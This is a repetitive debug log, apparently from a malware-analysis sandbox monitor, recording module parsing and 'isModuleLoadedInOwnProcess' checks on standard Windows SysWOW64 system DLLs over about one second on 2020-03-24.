2020-03-24 10:16:32,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,858 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:32,858 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:32,858 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:32,858 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:32,875 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:16:32,875 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:16:32,875 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:16:32,875 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:16:32,875 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:32,890 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:32,890 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:16:32,890 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:16:32,890 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,905 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,905 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,905 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:32,905 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,921 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,921 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,921 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,921 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,937 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,937 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,937 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,937 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,953 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,953 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,967 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,983 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:32,983 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,999 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,999 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,999 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,999 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,999 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,015 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,015 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,015 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,030 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,030 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,030 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,046 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:33,046 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:16:33,046 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:16:33,046 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:33,062 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:33,062 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:33,062 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:33,076 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:16:33,076 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:16:33,076 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:16:33,076 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:16:33,092 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:16:33,092 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:16:33,092 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:16:33,108 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:33,108 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:16:33,108 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,108 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,124 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,124 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,140 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,140 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,140 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,154 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,171 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,171 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,171 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,187 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,187 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,187 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,187 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,201 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,201 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,201 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,217 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,217 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,217 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,217 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,233 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,233 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,233 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,249 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,249 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,249 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,265 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,265 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,265 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,279 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,296 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,296 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,296 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,311 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,311 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,311 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,311 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,326 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,326 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,342 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,342 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,342 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,358 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,374 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,374 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,374 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,388 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,404 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,404 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,404 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,421 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,421 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,421 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,436 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,436 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,436 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,451 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,451 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,467 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,467 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,467 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,467 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,483 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,483 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,483 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,499 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,499 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,499 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,499 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,513 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,513 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,513 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,529 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,529 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,529 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,529 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,545 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,545 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,545 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,561 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,561 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,561 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,561 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,561 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,576 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,576 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,576 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,592 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,592 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,622 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,622 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,654 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,654 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,654 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,654 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,670 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winmm.dll
2020-03-24 10:16:33,670 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,670 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,686 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,700 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,717 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,717 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:16:33,717 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,747 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,747 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,779 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,779 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,779 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,779 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,795 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,795 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,795 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,811 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,811 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:16:33,811 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:33,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:33,842 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
